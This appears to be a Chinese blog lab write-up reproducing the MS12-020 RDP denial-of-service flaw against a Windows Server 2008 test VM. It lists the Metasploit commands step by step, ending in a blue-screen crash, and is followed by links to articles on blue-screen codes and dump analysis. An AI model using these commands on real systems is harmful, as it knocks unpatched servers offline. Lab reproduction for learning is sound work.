MS12-020漏洞复现(死亡蓝屏)

news/2024/11/29 22:54:02/

实验环境:

攻击机kali IP:192.168.32.128

靶机windows server 2008 IP:192.168.32.132

1、了解windows server2008虚拟机的基本信息检查是否安装有关该漏洞的补丁

使用systeminfo命令查看:

通过该页面可知:虚拟机win server2008没有安装任何补丁。

2、MS12-020漏洞攻击准备工作:

(1)windows server 2008需要开启远程桌面:

(2)获取靶机windows server 2008的IP,使用ipconfig命令:

(3)确保攻击机kali与靶机win server 2008可以ping通

3、使用msfconsole工具进行攻击。

(注:msfconsole工具可在Windows下载安装使用,kali自带此工具所以无需下载)

(1)攻击机kali开启msfconsole工具,使用命令:msfconsole

(2)搜索MS12-020漏洞可以使用的模块:msf6>search ms12-020

(3)使用use命令选定要利用的模块,这里选择0模块:

msf6>use auxiliary/dos/windows/rdp/ms12_020_maxchangelids

(4)查看需要填写的参数:

>show options

(5)建立目标地址,设置靶机(win server 2008)IP:

>set RHOSTS 192.168.32.132

(6)使用run命令运行模块:>run

 

实验结果:靶机win server 2008被远程操控而蓝屏。

 

 

 

 

 

 

 


http://www.ppmy.cn/news/444977.html

相关文章

常见电脑蓝屏代码以及解决办法

在我们使用电脑的过程中,最讨厌的一种颜色那便是“蓝色”了,有时候那突如其来的蓝屏简直让人崩溃。其实,电脑蓝屏也算是常见现象。造成电脑蓝屏的因素有很多,今天我将针对电脑常见的蓝屏给出相应的解决方案,希望对大家…

常见蓝屏代码解释及解决方法

蓝屏代码解释及解决方法 小云因为常遇到电脑蓝屏情况,今天就来整理一下部分常见的蓝屏代码分析及解决方法。 1、蓝屏代码 文字说明:IRQL-NOT-LESS-OR-EQVAL 通常的原因:驱动程序使用了不正确的内存地址。 解决方法:重新启动计…

windows蓝屏dump分析方法

 一、WinDbg是什么?它能做什么? WinDbg是在windows平台下,强大的用户态和内核态调试工具。它能够通过dmp文件轻松的定位到问题根源,可用于分析蓝屏、程序崩溃(IE崩溃)原因&#xf…

WinDbg蓝屏分析入门

一、WinDbg介绍 WinDbg,英文全称为Windows Debugger,Windows调试程序。 WinDbg是Windows平台下面的一款调试工具,通过dmp文件对蓝屏、程序崩溃原因进行分析,定位问题根源。官方描述WinDbg功能为以下三点: 调试内核模式…

Windows蓝屏代码大全及解决提示

知识点分析: 电脑出现蓝屏现象时,由于导致蓝屏现象的原因较多,建议先通过此款软件进行分析,简单确定蓝屏原因。 操作步骤: BlueScreenView不需要任何安装过程或额外的DLL文件,只需运行可执行文件 BlueScreenView.exe就可以了。Blu…

Windows常见蓝屏代码及解决方法

1.Windows系统中最常见的10种蓝屏代码含义及解决办法1.0x0000000A 此问题百分之八十是驱动冲突,显卡和芯片组的问题偏多,如果出现这个蓝屏代码,建议进安全模式,删除最近的更新和安装的显卡和主板驱动。 2.0x0000001A 此问题大多是…

Windows 蓝屏代码大全,Bug检查代码参考

浏览器中 ctrlF 调出查找 属于相应代码即可 下表提供了 Bug 检查代码的链接。 代码名称0x00000001APC_INDEX_MISMATCH0x00000002DEVICE_QUEUE_NOT_BUSY0x00000003INVALID_AFFINITY_SET0x00000004INVALID_DATA_ACCESS_TRAP0x00000005INVALID_PROCESS_ATTACH_ATTEMPT0x00000006…

Windows蓝屏之后,DUMP分析教程

前言 Windows蓝屏之后,单单通过蓝屏代码,很难定位问题!分析一下dmp文件,就准确多了! 这是一篇老文章,原文链接早已不能访问,但是并不影响它的价值! 对于运维人员而言,…